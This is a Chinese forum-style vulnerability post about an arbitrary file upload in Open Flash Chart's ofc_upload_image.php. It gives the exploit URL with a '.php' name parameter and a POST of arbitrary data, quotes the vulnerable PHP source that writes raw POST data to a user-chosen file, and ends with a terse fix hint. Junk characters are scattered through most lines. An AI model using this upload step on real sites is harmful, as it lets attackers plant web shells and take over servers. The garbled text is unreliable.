POST 数据漏洞文件执行任意后缀文件保存
0 S5 Z& ?2 Z* ^# D$ \ 漏洞文件/chart/php-ofc-library/ofc_upload_image.php
: D6 u" G, f. U7 t. j6 h' h& P+ U% z# E$ M% Z
利用:. }6 ~0 S1 s" |3 v' r& c* g
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名8 V5 h* H7 U& R1 a4 ?
h- F0 [4 a$ O8 T& w
Post任意数据6 O) Q6 `" f9 M4 M5 y
保存位置http://localhost/chart/tmp-upload-images/hfy.php$ |, H% D" N" u& B
, Y+ q) G. ? ?% t2 I! o9 @
) f) j5 G6 [! ]+ s
最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~3 [1 Z/ Z4 j( e' v4 }
/ a# Z' T1 E! s1 ^3 a<?php
( j: ^& S i: U; R1 G" i
' G2 Z' B. e2 v$ X; V//
& }; u* i2 ^. b0 a( V5 v" N8 b) V// In Open Flash Chart -> save_image debug mode, you) [! b) s) m" Y
// will see the 'echo' text in a new window.
2 s* F+ P+ B N1 k: H: v/// C K+ i( j2 t( w9 `
, Y4 Y6 v, ~/ M7 _/*
! Q) ~ [2 Z4 A* j7 t F: c( ]: l7 [7 ~* y& a
print_r( $_GET );
( H0 N8 i, @# R% V9 [print_r( $_POST );% k! z7 c, J! V% [2 c
print_r( $_FILES );
0 q6 U; E$ G. h( x1 x. l* F( |6 ?+ b! v9 p! J
print_r( $GLOBALS );
) b% ]6 a$ E2 M$ }0 l+ m2 k* u1 aprint_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
0 ^1 i6 ^( F$ r' V: L& D% v$ ~# g/ F5 W/ j
*/
. V ?6 Y3 r% K, V/ K' [/ k4 h// default path for the image to be stored //: A! v5 g& x! r6 H+ R) ^
$default_path = '../tmp-upload-images/';6 O" e* ^) D* X$ |6 c+ Y' B) k
- N& j. {& e( o; D. Yif (!file_exists($default_path)) mkdir($default_path, 0777, true);& ?2 o9 x6 I+ l; \4 {
. `- n" T% O7 O6 {! l" D// full path to the saved image including filename //
: F- ~' X6 S: c' f' \# j. {$destination = $default_path . basename( $_GET[ 'name' ] );
/ a. s6 t* Y. U' Y$ n( m
+ Y( K- U9 k$ \- r. M+ aecho 'Saving your image to: '. $destination; r' d( ^ }0 i w' o* i
// print_r( $_POST );) ]4 u: }; I2 U, v- V2 K
// print_r( $_SERVER );
, |# K5 p L) T3 r& ^& G// echo $HTTP_RAW_POST_DATA;
2 J2 V+ ~4 Y6 p
/ L, H! F) g* {( r: h//
+ Y2 e# G# y' c, x- ?+ \// POST data is usually string data, but we are passing a RAW .png3 ^6 N# o0 R7 d E' j6 y$ q
// so PHP is a bit confused and $_POST is empty. But it has saved
1 M) F" J2 d t& ~( H( [// the raw bits into $HTTP_RAW_POST_DATA
) Y; e0 t3 S( v+ _8 T//
* y- ]0 g' v5 b+ }* ~. r. e
$ w# m' P' R6 p6 a% C$jfh = fopen($destination, 'w') or die("can't open file");
9 \" c& K, U- Lfwrite($jfh, $HTTP_RAW_POST_DATA);
9 \ ]5 J/ B# o C7 wfclose($jfh); S1 l& i, i( E: A- ~& F
8 C/ T. p; }) H8 c0 ]
//
$ B9 N/ o- s6 H/ E( w- {' h; d& X// LOOK:
# j7 m, D6 E# z' `8 R//
; @% x- b0 m6 O, `exit();
6 q$ y' a# H$ Y7 J+ `//
* ?1 B; {/ l- o1 b8 H: d6 A// PHP5:
9 Z( H: Y; h. W+ k9 w//
7 Z8 }" l4 y. E! P* a
9 w, l. E, M- S/ N- V
5 L6 n1 `" t5 c9 T0 D. t2 Y9 ]! ~// default path for the image to be stored //
# x7 p/ D% E, _( G4 C2 G9 ?% L$default_path = 'tmp-upload-images/';" j! }: O y1 M+ t5 e& X* K
# U0 E6 [% h0 ^5 E( wif (!file_exists($default_path)) mkdir($default_path, 0777, true);
& z) F( V, k1 x; h- _% b: N
7 Z* M: P B: d5 N// full path to the saved image including filename //9 `; D8 p8 B3 I
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] ); " k' O9 A3 b4 q" G
( t7 C5 @: j. y! M9 d! n// move the image into the specified directory //$ m3 p3 j- l. H/ m1 u
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
' r+ P4 B6 k" A( V% N echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
+ V1 J8 P2 Z- k} else {
4 p4 M: S0 F% Y* x: w7 S3 L echo "FILE UPLOAD FAILED";
" Z! G4 k. L: W! d}- C& d3 X( m, j4 X9 I z9 q
, i. e( e6 g, e' ?0 Q S' e
/ H5 @9 u& J) q3 y; l?>
' Y- x& K- C8 t. q( N7 x
. R0 K6 h8 }$ F: V, \9 [' D% R r% U8 W. ?
9 _ h( J B* t2 d# q: C( J% y# L
% L( {& C7 F8 Q: p
8 X! I& m% }; q9 M: {
" \- ]$ Y! ~! i8 Y) w6 L修复方案:
' r0 ^7 }/ J. e6 p; H这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞
8 Q5 g+ q3 b& Y1 R- C" |9 A( |, f0 v$ Y
' h: P ^& I$ M5 Q" l7 }7 B
/ f* o3 k3 P& p. h5 W* ?8 S0 w/ A3 B9 [
|